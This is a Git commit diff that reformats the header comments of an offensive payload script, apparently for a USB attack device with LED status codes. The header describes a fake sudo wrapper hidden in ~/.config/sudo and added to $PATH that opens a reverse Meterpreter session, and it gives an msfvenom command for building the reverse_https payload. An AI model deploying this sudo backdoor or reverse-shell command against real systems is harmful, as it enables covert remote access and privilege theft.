Cleanup: bushingsBlueTurtle: Update Payload Header

This commit is contained in:
Marc 2019-07-05 07:54:50 +01:00 committed by GitHub
parent 39b0d2887a
commit 67527e8ce0
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -4,27 +4,24 @@
# Author: Michael Weinstein
# Target: Mac/Linux
# Version: 0.1
# Description: Create a wrapper for sudo sessions that will live inside ~/.config/sudo and be added
# to the $PATH. After completing the sudo task for the user, it will attempt an encrypted
# reverse meterpreter session. The msfvenom payload should be in this same directory as
# shell.py Run the following command to generate a payload, remember to input the appropriate
# IP and port
# msfvenom -p python/meterpreter/reverse_https LHOST=<IP ADDRESS> LPORT=<PORT> -f raw > payload.py
#
# Create a wrapper for sudo sessions that
# will live inside ~/.config/sudo and be added
# to the $PATH. After completing the sudo task
# for the user, it will attempt an encrypted reverse
# meterpreter session. The msfvenom payload
# should be in this same directory as shell.py
# Run the following command to generate a payload,
# remember to input the appropriate IP and port
# msfvenom -p python/meterpreter/reverse_https LHOST=<IP ADDRESS> LPORT=<PORT> -f raw > payload.py
# This payload was inspired greatly by SudoBackdoor
# and much of the code here was derived (or copied
# wholesale) from that with great thanks to oXis.
#
# This payload was inspired greatly by SudoBackdoor
# and much of the code here was derived (or copied
# wholesale) from that with great thanks to oXis.
# This one's for Bushing. Probably should have written it in Perl.
#
# This one's for Bushing. Probably should have written it in Perl.
#
# White | Ready
# Amber blinking | Waiting for server
# Blue blinking | Attacking
# Green | Finished
# LEDS:
# White: Ready
# Amber Blink: Waiting for server
# Blue Blink: Attacking
# Green: Finished
LED SETUP